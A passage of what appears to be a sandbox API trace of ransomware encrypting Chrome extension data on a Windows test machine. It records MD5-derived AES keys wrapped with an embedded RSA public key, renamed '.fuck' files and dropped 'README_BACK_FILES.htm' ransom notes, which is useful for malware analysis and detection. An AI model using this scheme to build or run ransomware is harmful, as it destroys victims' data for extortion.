FindNextFileA (in: hFindFile=0x2e7fb00, lpFindFileData=0x2b9dbb8 | out: lpFindFileData=0x2b9dbb8) returned 1 [0264.788] FindNextFileA (in: hFindFile=0x2e7fb00, lpFindFileData=0x2b9dbb8 | out: lpFindFileData=0x2b9dbb8) returned 1 [0264.788] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Local Extension Settings\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\*.*", lpFindFileData=0x2b9d81c | out: lpFindFileData=0x2b9d81c) returned 0x2e7fbc0 [0264.794] FindNextFileA (in: hFindFile=0x2e7fbc0, lpFindFileData=0x2b9d81c | out: lpFindFileData=0x2b9d81c) returned 1 [0264.794] FindNextFileA (in: hFindFile=0x2e7fbc0, lpFindFileData=0x2b9d81c | out: lpFindFileData=0x2b9d81c) returned 1 [0264.794] FindNextFileA (in: hFindFile=0x2e7fbc0, lpFindFileData=0x2b9d81c | out: lpFindFileData=0x2b9d81c) returned 1 [0264.794] FindNextFileA (in: hFindFile=0x2e7fbc0, lpFindFileData=0x2b9d81c | out: lpFindFileData=0x2b9d81c) returned 1 [0264.794] FindNextFileA (in: hFindFile=0x2e7fbc0, lpFindFileData=0x2b9d81c | out: lpFindFileData=0x2b9d81c) returned 1 [0264.794] FindNextFileA (in: hFindFile=0x2e7fbc0, lpFindFileData=0x2b9d81c | out: lpFindFileData=0x2b9d81c) returned 1 [0264.795] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9d72c | out: lpSystemTimeAsFileTime=0x2b9d72c) [0264.795] GetLastError () returned 0x0 [0264.795] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Local Extension Settings\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\LOG.old" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\local extension settings\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\log.old")) returned 0x20 [0264.795] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Local Extension Settings\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\LOG.old", dwFileAttributes=0x80) returned 1 [0264.796] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Local Extension Settings\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\LOG.old" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\local extension settings\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\log.old"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d50 [0264.797] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Local Extension Settings\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\LOG.old.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\local extension settings\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\log.old.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d4c [0264.797] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Local Extension Settings\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\LOG.old.gsg", dwFileAttributes=0x2) returned 1 [0264.798] CryptAcquireContextA (in: phProv=0x2b9c728, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9c728*=0x2e75dd0) returned 1 [0264.799] CryptCreateHash (in: hProv=0x2e75dd0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9c72c | out: phHash=0x2b9c72c) returned 1 [0264.800] lstrlenA (lpString="cQjUWNeXOWocqpPGVyWaXFrKzMlQm") returned 29 [0264.800] CryptHashData (hHash=0x2e7fc00, pbData=0x28cb4e0, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0264.800] CryptDeriveKey (in: hProv=0x2e75dd0, Algid=0x6610, hBaseData=0x2e7fc00, dwFlags=0x1000000, phKey=0x2b9c718 | out: phKey=0x2b9c718*=0x2e7da00) returned 1 [0264.800] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----k", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9c734, pcbBinary=0x2b9c714, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9c734, pcbBinary=0x2b9c714, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0264.800] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9c734, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9c708, pcbStructInfo=0x2b9c710 | out: pvStructInfo=0x2b9c708, pcbStructInfo=0x2b9c710) returned 1 [0264.800] CryptAcquireContextA (in: phProv=0x2b9c724, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9c724*=0x2e776c8) returned 1 [0264.800] CryptImportPublicKeyInfo (in: hCryptProv=0x2e776c8, dwCertEncodingType=0x1, pInfo=0x2eaee20*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2eaee50*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2eaee58*, PublicKey.cUnusedBits=0x0), phKey=0x2b9c71c | out: phKey=0x2b9c71c*=0x2e7e940) returned 1 [0264.800] CryptEncrypt (in: hKey=0x2e7e940, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9c70c*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9c70c*=0x80) returned 1 [0264.800] CryptEncrypt (in: hKey=0x2e7e940, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2e76e48*, pdwDataLen=0x2b9c720*=0x18, dwBufLen=0x80 | out: pbData=0x2e76e48*, pdwDataLen=0x2b9c720*=0x80) returned 1 [0264.800] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2e76e48*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9c730, lpOverlapped=0x0 | out: lpBuffer=0x2e76e48*, lpNumberOfBytesWritten=0x2b9c730*=0x80, lpOverlapped=0x0) returned 1 [0264.801] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c730, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c730*=0xbc, lpOverlapped=0x0) returned 1 [0264.802] CryptEncrypt (in: hKey=0x2e7da00, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c730*=0xbc, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c730*=0xc0) returned 1 [0264.802] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0xc0, lpNumberOfBytesWritten=0x2b9c730, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c730*=0xc0, lpOverlapped=0x0) returned 1 [0264.803] CloseHandle (hObject=0x5d50) returned 1 [0264.803] CloseHandle (hObject=0x5d4c) returned 1 [0264.803] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Local Extension Settings\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\LOG.old.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\local extension settings\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\log.old.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Local Extension Settings\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\LOG.old" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\local extension settings\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\log.old"), bFailIfExists=0) returned 1 [0264.807] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Local Extension Settings\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\LOG.old", dwFileAttributes=0x0) returned 1 [0264.808] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Local Extension Settings\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\LOG.old.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\local extension settings\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\log.old.gsg")) returned 1 [0264.809] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Local Extension Settings\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\LOG.old" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\local extension settings\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\log.old"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Local Extension Settings\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\LOG.old.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\local extension settings\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\log.old.fuck")) returned 1 [0264.810] CryptDestroyHash (hHash=0x2e7fc00) returned 1 [0264.810] CryptDestroyKey (hKey=0x2e7da00) returned 1 [0264.810] CryptReleaseContext (hProv=0x2e75dd0, dwFlags=0x0) returned 1 [0264.810] FindNextFileA (in: hFindFile=0x2e7fbc0, lpFindFileData=0x2b9d81c | out: lpFindFileData=0x2b9d81c) returned 1 [0264.810] FindNextFileA (in: hFindFile=0x2e7fbc0, lpFindFileData=0x2b9d81c | out: lpFindFileData=0x2b9d81c) returned 0 [0264.810] FindClose (in: hFindFile=0x2e7fbc0 | out: hFindFile=0x2e7fbc0) returned 1 [0264.810] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Local Extension Settings\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\local extension settings\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\readme_back_files.htm")) returned 0xffffffff [0264.810] AreFileApisANSI () returned 1 [0264.810] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e4378, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 149 [0264.810] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Local Extension Settings\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\local extension settings\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9d9a0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d48 [0264.811] GetFileType (hFile=0x5d48) returned 0x1 [0264.811] WriteFile (in: hFile=0x5d48, lpBuffer=0x2b9c5ec*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9c5e4, lpOverlapped=0x0 | out: lpBuffer=0x2b9c5ec*, lpNumberOfBytesWritten=0x2b9c5e4*=0x5ec, lpOverlapped=0x0) returned 1 [0264.812] FindNextFileA (in: hFindFile=0x2e7fb00, lpFindFileData=0x2b9dbb8 | out: lpFindFileData=0x2b9dbb8) returned 0 [0264.812] FindClose (in: hFindFile=0x2e7fb00 | out: hFindFile=0x2e7fb00) returned 1 [0264.812] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Local Extension Settings\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\local extension settings\\readme_back_files.htm")) returned 0xffffffff [0264.812] AreFileApisANSI () returned 1 [0264.812] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e7a500, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 116 [0264.813] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Local Extension Settings\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\local extension settings\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9dd3c, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d40 [0264.815] GetFileType (hFile=0x5d40) returned 0x1 [0264.815] WriteFile (in: hFile=0x5d40, lpBuffer=0x2b9c988*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9c980, lpOverlapped=0x0 | out: lpBuffer=0x2b9c988*, lpNumberOfBytesWritten=0x2b9c980*=0x5ec, lpOverlapped=0x0) returned 1 [0264.816] FindNextFileA (in: hFindFile=0x29386f8, lpFindFileData=0x2b9df54 | out: lpFindFileData=0x2b9df54) returned 1 [0264.816] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Local Storage\\*.*", lpFindFileData=0x2b9dbb8 | out: lpFindFileData=0x2b9dbb8) returned 0x2e7fb00 [0264.826] FindNextFileA (in: hFindFile=0x2e7fb00, lpFindFileData=0x2b9dbb8 | out: lpFindFileData=0x2b9dbb8) returned 1 [0264.826] FindNextFileA (in: hFindFile=0x2e7fb00, lpFindFileData=0x2b9dbb8 | out: lpFindFileData=0x2b9dbb8) returned 1 [0264.826] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9dac8 | out: lpSystemTimeAsFileTime=0x2b9dac8) [0264.826] GetLastError () returned 0x0 [0264.826] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Local Storage\\chrome-extension_pkedcjkdefgpdelpbcmbmeomcjbeemfm_0.localstorage" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\local storage\\chrome-extension_pkedcjkdefgpdelpbcmbmeomcjbeemfm_0.localstorage")) returned 0x20 [0264.827] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Local Storage\\chrome-extension_pkedcjkdefgpdelpbcmbmeomcjbeemfm_0.localstorage", dwFileAttributes=0x80) returned 1 [0264.828] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Local Storage\\chrome-extension_pkedcjkdefgpdelpbcmbmeomcjbeemfm_0.localstorage" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\local storage\\chrome-extension_pkedcjkdefgpdelpbcmbmeomcjbeemfm_0.localstorage"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d48 [0264.829] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Local Storage\\chrome-extension_pkedcjkdefgpdelpbcmbmeomcjbeemfm_0.localstorage.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\local storage\\chrome-extension_pkedcjkdefgpdelpbcmbmeomcjbeemfm_0.localstorage.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d4c [0264.830] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Local Storage\\chrome-extension_pkedcjkdefgpdelpbcmbmeomcjbeemfm_0.localstorage.gsg", dwFileAttributes=0x2) returned 1 [0264.830] CryptAcquireContextA (in: phProv=0x2b9cac4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9cac4*=0x2e7a500) returned 1 [0264.832] CryptCreateHash (in: hProv=0x2e7a500, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9cac8 | out: phHash=0x2b9cac8) returned 1 [0264.832] lstrlenA (lpString="cQjUWNeXOWocqpPGVyWaXFrKzMlQm") returned 29 [0264.832] CryptHashData (hHash=0x2e7fbc0, pbData=0x28cb710, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0264.832] CryptDeriveKey (in: hProv=0x2e7a500, Algid=0x6610, hBaseData=0x2e7fbc0, dwFlags=0x1000000, phKey=0x2b9cab4 | out: phKey=0x2b9cab4*=0x2e7fc40) returned 1 [0264.833] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9cad0, pcbBinary=0x2b9cab0, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9cad0, pcbBinary=0x2b9cab0, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0264.833] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9cad0, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9caa4, pcbStructInfo=0x2b9caac | out: pvStructInfo=0x2b9caa4, pcbStructInfo=0x2b9caac) returned 1 [0264.833] CryptAcquireContextA (in: phProv=0x2b9cac0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9cac0*=0x2e75dd0) returned 1 [0264.833] CryptImportPublicKeyInfo (in: hCryptProv=0x2e75dd0, dwCertEncodingType=0x1, pInfo=0x2eaea10*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2eaea40*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2eaea48*, PublicKey.cUnusedBits=0x0), phKey=0x2b9cab8 | out: phKey=0x2b9cab8*=0x2e7da00) returned 1 [0264.833] CryptEncrypt (in: hKey=0x2e7da00, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9caa8*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9caa8*=0x80) returned 1 [0264.833] CryptEncrypt (in: hKey=0x2e7da00, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2e77b08*, pdwDataLen=0x2b9cabc*=0x18, dwBufLen=0x80 | out: pbData=0x2e77b08*, pdwDataLen=0x2b9cabc*=0x80) returned 1 [0264.833] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2e77b08*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9cacc, lpOverlapped=0x0 | out: lpBuffer=0x2e77b08*, lpNumberOfBytesWritten=0x2b9cacc*=0x80, lpOverlapped=0x0) returned 1 [0264.835] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9cacc, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9cacc*=0x380, lpOverlapped=0x0) returned 1 [0264.845] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9cacc*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9cacc*=0x380) returned 1 [0264.845] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9cacc, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9cacc*=0x380, lpOverlapped=0x0) returned 1 [0264.850] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9cacc, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9cacc*=0x380, lpOverlapped=0x0) returned 1 [0264.850] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9cacc*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9cacc*=0x380) returned 1 [0264.850] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9cacc, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9cacc*=0x380, lpOverlapped=0x0) returned 1 [0264.851] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9cacc, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9cacc*=0x380, lpOverlapped=0x0) returned 1 [0264.851] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9cacc*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9cacc*=0x380) returned 1 [0264.851] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9cacc, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9cacc*=0x380, lpOverlapped=0x0) returned 1 [0264.851] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9cacc, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9cacc*=0x380, lpOverlapped=0x0) returned 1 [0264.851] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9cacc*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9cacc*=0x380) returned 1 [0264.851] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9cacc, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9cacc*=0x380, lpOverlapped=0x0) returned 1 [0264.851] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9cacc, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9cacc*=0x380, lpOverlapped=0x0) returned 1 [0264.851] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9cacc*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9cacc*=0x380) returned 1 [0264.851] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9cacc, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9cacc*=0x380, lpOverlapped=0x0) returned 1 [0264.852] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9cacc, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9cacc*=0x380, lpOverlapped=0x0) returned 1 [0264.852] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9cacc*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9cacc*=0x380) returned 1 [0264.852] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9cacc, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9cacc*=0x380, lpOverlapped=0x0) returned 1 [0264.852] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9cacc, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9cacc*=0x380, lpOverlapped=0x0) returned 1 [0264.852] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9cacc*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9cacc*=0x380) returned 1 [0264.852] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9cacc, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9cacc*=0x380, lpOverlapped=0x0) returned 1 [0264.852] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9cacc, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9cacc*=0x380, lpOverlapped=0x0) returned 1 [0264.852] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9cacc*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9cacc*=0x380) returned 1 [0264.852] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9cacc, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9cacc*=0x380, lpOverlapped=0x0) returned 1 [0264.852] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9cacc, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9cacc*=0x380, lpOverlapped=0x0) returned 1 [0264.852] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9cacc*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9cacc*=0x380) returned 1 [0264.852] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9cacc, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9cacc*=0x380, lpOverlapped=0x0) returned 1 [0264.853] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9cacc, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9cacc*=0x380, lpOverlapped=0x0) returned 1 [0264.853] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, 